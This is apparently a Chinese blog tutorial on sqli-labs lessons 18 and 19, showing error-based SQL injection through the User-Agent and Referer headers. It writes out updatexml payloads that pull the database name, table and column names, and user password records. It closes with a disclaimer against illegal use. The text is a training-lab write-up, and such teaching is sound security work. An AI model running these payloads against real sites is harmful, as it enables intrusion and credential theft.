16、HTTP头注入(User-Agent、Referer)

简介: 16、HTTP头注入(User-Agent、Referer)

环境sqli-labs


less 18


1、在UA处输入特殊字符,报错

0a2653c851af460fa595bd959398a8f1.png0eacb84100b54626af849e6b562bf92a.png

2、构造输入语句,获取数据库名称

or updatexml(1,concat(’##’,(database())),0))#


2d65d23f6d4748949b924e4057485923.png2e9b90b2ca334476abebe75bafe6eeaa.png


3、获取表名

or updatexml(1,concat(’##’,(select group_concat(table_name) from information_schema.tables where table_schema=‘security’)),0))#

4cebaac233b3433da32a72337a77fc60.png6de278e6d6694ce5bb08e7e842b7e74b.png


4、获取字段

or updatexml(1,concat(’#’,(select group_concat(column_name) from information_schema.columns where table_schema=‘security’ and table_name=‘users’)),0))#


7a399525ddec4b77923c464820b33738 (1).png7a399525ddec4b77923c464820b33738.png


5、获取字段内容

or updatexml(1,concat(’#’,(select * from (select concat_ws(’#’,id,username,password) from users limit 0,1) a)),0))#


92ba0822ed0b46e1ae72df8a17d3a45b.png132ed0b65b344cf9a1fbe1887ab4ab6f.png


less 19


输入点在referer,注入语句同less 18


禁止非法,后果自负


目录
相关文章
|
8月前
|
16、HTTP头注入(User-Agent、Referer)
16、HTTP头注入(User-Agent、Referer)
94 0
Web安全-HTTP响应拆分(CRLF注入)漏洞
Web安全-HTTP响应拆分(CRLF注入)漏洞
222 1
【HTTP】请求“报头”,Referer 和 Cookie
【HTTP】请求“报头”,Referer 和 Cookie
66 1
【HTTP】请求“报头”,Referer 和 Cookie
【HTTP】请求“报头”(Host、Content-Length/Content-Type、User-Agent(简称 UA))
【HTTP】请求“报头”(Host、Content-Length/Content-Type、User-Agent(简称 UA))
169 1
Web安全-HTTP响应拆分(CRLF注入)漏洞
Web安全-HTTP响应拆分(CRLF注入)漏洞
257 8
|
5月前
【Azure 云服务】Azure Cloud Service 为 Web Role(IIS Host)增加自定义字段 (把HTTP Request Header中的User-Agent字段增加到IIS输出日志中)
【Azure 云服务】Azure Cloud Service 为 Web Role(IIS Host)增加自定义字段 (把HTTP Request Header中的User-Agent字段增加到IIS输出日志中)
Gemini 2.0:谷歌推出的原生多模态输入输出 + Agent 为核心的 AI 模型
谷歌最新推出的Gemini 2.0是一款原生多模态输入输出的AI模型,以Agent技术为核心,支持多种数据类型的输入与输出,具备强大的性能和多语言音频输出能力。本文将详细介绍Gemini 2.0的主要功能、技术原理及其在多个领域的应用场景。
294 20
Gemini 2.0:谷歌推出的原生多模态输入输出 + Agent 为核心的 AI 模型
TEN Agent:开源的实时多模态 AI 代理框架,支持语音、文本和图像的实时通信交互
TEN Agent 是一个开源的实时多模态 AI 代理框架,集成了 OpenAI Realtime API 和 RTC 技术,支持语音、文本和图像的多模态交互,具备实时通信、模块化设计和多语言支持等功能,适用于智能客服、实时语音助手等多种场景。
199 15
TEN Agent:开源的实时多模态 AI 代理框架,支持语音、文本和图像的实时通信交互
AI助理

你好,我是AI助理

可以解答问题、推荐解决方案等